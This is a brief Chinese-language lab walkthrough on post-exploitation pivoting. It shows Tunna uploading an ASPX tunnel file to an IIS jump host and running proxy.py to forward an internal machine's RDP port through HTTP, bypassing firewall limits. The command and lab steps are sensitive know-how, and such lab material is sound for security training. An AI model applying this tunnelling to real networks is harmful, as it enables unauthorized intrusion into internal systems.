Tunna:一款神奇的工具,它可以通过HTTP封装隧道通信任何TCP,以及用于绕过防火墙环境中的网络限制。

命令python proxy.py -u http://192.168.70.129/conn.aspx -l 2345 -a 10.1.1.1 -r 3389 -s -v

-l 表示本地监听的端口
-r 远程要转发的端口
-v 详细模式

后渗透——内网转发之利用内网穿透工具Tunna转发端口连接远程桌面_网络安全

实验环境:
  • Windows Server 2008 R2 x64(目标机)
  • Windows Server 2003(跳板机)
  • IIS服务器
  • Python 2.7.17的环境
  • Tunna-master

后渗透——内网转发之利用内网穿透工具Tunna转发端口连接远程桌面_网络安全_02

后渗透——内网转发之利用内网穿透工具Tunna转发端口连接远程桌面_网络安全

环境搭建:

win2003添加两块网卡
后渗透——内网转发之利用内网穿透工具Tunna转发端口连接远程桌面_网络安全_04
一块网卡ip固定为10.1.1.2
后渗透——内网转发之利用内网穿透工具Tunna转发端口连接远程桌面_安全技术_05

将conn.aspx文件上传到win2003的IIS目录下
后渗透——内网转发之利用内网穿透工具Tunna转发端口连接远程桌面_网络安全_06

后渗透——内网转发之利用内网穿透工具Tunna转发端口连接远程桌面_网络安全

模拟实验:

进入D:\常用\EVCapture\录屏\day0318\Tunna-masterproxy.py所在目录
后渗透——内网转发之利用内网穿透工具Tunna转发端口连接远程桌面_安全技术_08

输入python proxy.py -u http://192.168.70.129/conn.aspx -l 2345 -a 10.1.1.1 -r 3389 -s -v
后渗透——内网转发之利用内网穿透工具Tunna转发端口连接远程桌面_安全技术_09
然后远程桌面连接127.0.0.1:2345成功
后渗透——内网转发之利用内网穿透工具Tunna转发端口连接远程桌面_网络安全_10